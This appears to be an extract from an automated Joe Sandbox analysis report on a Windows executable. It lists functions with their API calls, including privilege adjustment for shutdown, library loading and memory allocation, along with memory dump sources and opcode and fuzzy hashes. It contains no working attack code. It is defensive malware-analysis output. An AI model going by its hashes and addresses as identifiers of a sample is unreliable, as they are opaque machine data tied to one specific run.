                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2087232378-0
                                                                                                                                                                      • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                      • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                                                                      • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                                                      • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004085CC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                                                                                                                                        • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                                                                                                                                        • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1658689577-0
                                                                                                                                                                      • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                                                                                                                      • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                                                                                                                                      • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00450798 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                                                                                                                      • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                                                                      • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                                                                                                                                      • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E8C0 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FormatMessage
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1306739567-0
                                                                                                                                                                      • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                                                                                                                      • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                                                                                                                                      • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004062E8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                      • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                                      • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                                                                                      • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                                                      • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00423644 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                                                                                                                                      • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                                                                                                                        • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoParametersSystem$ShowWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3202724764-0
                                                                                                                                                                      • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                                                                                                                      • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                                                                                                                                      • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004242BC Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: TextWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 530164218-0
                                                                                                                                                                      • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                                                                                                                      • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E3E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                                                                                                                                      • Instruction ID: 0a31ae7c3a111c16d424c34ef622fbdc70eb0dd2bd2df7fa5b045972c40067f9
                                                                                                                                                                      • Opcode Fuzzy Hash: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                                                                                                                                      • Instruction Fuzzy Hash: C5B09B7670C6105DA719DED5B45552D63D4D7C47207E14477F000D2581D97C58014A18
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041F3BC Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                                                                                                                      • Instruction ID: cb23d80071df23bba1d133aab7454d5b1bd3cce231e0a29d7ee5219cf2fb9859
                                                                                                                                                                      • Opcode Fuzzy Hash: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                                                                                                                      • Instruction Fuzzy Hash: 08115A752407059BDB10DF19D880B86FBE5EF58350F10C53BE9A88B385D374E84ACBA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                                                      • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                                                      • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 0041F110 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                                                                                                                      • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                                                                                                                      • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                                                      • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                                                      • API String ID: 2323315520-3614243559
                                                                                                                                                                      • Opcode ID: ebfa7cc4e9d2bee4abfdbe54d6196473fbc58973c16168d3fcc2f8ebf74b7847
                                                                                                                                                                      • Instruction ID: b3d5d35426b7a88a41f50cbf902c37b37573112488e24e2852513ec86d1b0e77
                                                                                                                                                                      • Opcode Fuzzy Hash: ebfa7cc4e9d2bee4abfdbe54d6196473fbc58973c16168d3fcc2f8ebf74b7847
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F3150B2600700ABEB01EBB9AC46A6B3794F728324751093FB508D72A2E77C5C55CF5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00422854 Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendShowWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1631623395-0
                                                                                                                                                                      • Opcode ID: 60da21abaace98eb07ed033d7e9f511cd5e0a4a408c56ddf26b7b8ab8925c05a
                                                                                                                                                                      • Instruction ID: 1945ea129714beb182378817fb96d2750a9cf3de1b1d00e1964b2da952e4e1c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 60da21abaace98eb07ed033d7e9f511cd5e0a4a408c56ddf26b7b8ab8925c05a
                                                                                                                                                                      • Instruction Fuzzy Hash: 54917071B04254BFDB10DFA9DA86F9E77F4AB04304F5501BAF904AB292C778AE40DB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041837C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsIconic.USER32(?), ref: 0041838B
                                                                                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                                                                                                                                      • GetWindowRect.USER32(?), ref: 004183C4
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                                                                                                                                      • ScreenToClient.USER32(00000000), ref: 004183F0
                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                      • String ID: ,
                                                                                                                                                                      • API String ID: 2266315723-3772416878
                                                                                                                                                                      • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                                                                                      • Instruction ID: e201a0486811adc056edcb3d82b1b2fee19cba914b7849b2462e59dde51cd5f3
                                                                                                                                                                      • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                                                                                      • Instruction Fuzzy Hash: A3112BB1505201ABEB00DF69C885F9B77E8AF48314F15067EFD58DB296D738D900CBA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004555B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
